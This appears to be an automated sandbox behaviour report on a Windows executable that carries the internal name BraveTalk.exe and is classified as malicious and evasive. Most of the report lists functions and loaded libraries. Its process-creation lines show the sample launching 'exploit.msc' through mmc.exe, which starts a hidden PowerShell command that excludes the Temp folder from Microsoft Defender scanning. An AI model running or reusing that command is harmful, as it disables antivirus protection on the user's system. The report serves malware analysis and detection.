Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A076C00_2_00007FF752A076C0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A24B980_2_00007FF752A24B98
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A1BB900_2_00007FF752A1BB90
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A15B600_2_00007FF752A15B60
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A38C1C0_2_00007FF752A38C1C
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A389A00_2_00007FF752A389A0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A1C96C0_2_00007FF752A1C96C
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A239640_2_00007FF752A23964
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A01AA40_2_00007FF752A01AA4
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A22AB00_2_00007FF752A22AB0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A45AF80_2_00007FF752A45AF8
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A11A480_2_00007FF752A11A48
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A3FA940_2_00007FF752A3FA94
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A1AF180_2_00007FF752A1AF18
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A420800_2_00007FF752A42080
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A307540_2_00007FF752A30754
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A28DF40_2_00007FF752A28DF4
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A22D580_2_00007FF752A22D58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB980947FA2_2_00007FFB980947FA
Source: IPt9U27NoX.exeBinary or memory string: OriginalFilename vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000002.2758602733.000001D84268D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemmc.exe.muij% vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000002.2758602733.000001D84268D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemmc.exej% vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000000.892909176.00007FF752A6F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000002.2760129377.00007FF752A6E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000003.894976787.000001D8465EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000003.894266796.000001D845CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exeBinary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: classification engineClassification label: mal60.evad.winEXE@8/14@1/2
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A0B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF752A0B6D8
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A28624 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF752A28624
Source: C:\Windows\System32\mmc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\MMCJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_03
Source: C:\Users\user\Desktop\IPt9U27NoX.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0Jump to behavior
Source: IPt9U27NoX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IPt9U27NoX.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: IPt9U27NoX.exeVirustotal: Detection: 7%
Source: C:\Users\user\Desktop\IPt9U27NoX.exeFile read: C:\Users\user\Desktop\IPt9U27NoX.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\IPt9U27NoX.exe "C:\Users\user\Desktop\IPt9U27NoX.exe"
Source: C:\Users\user\Desktop\IPt9U27NoX.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc"
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\IPt9U27NoX.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" Jump to behavior
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
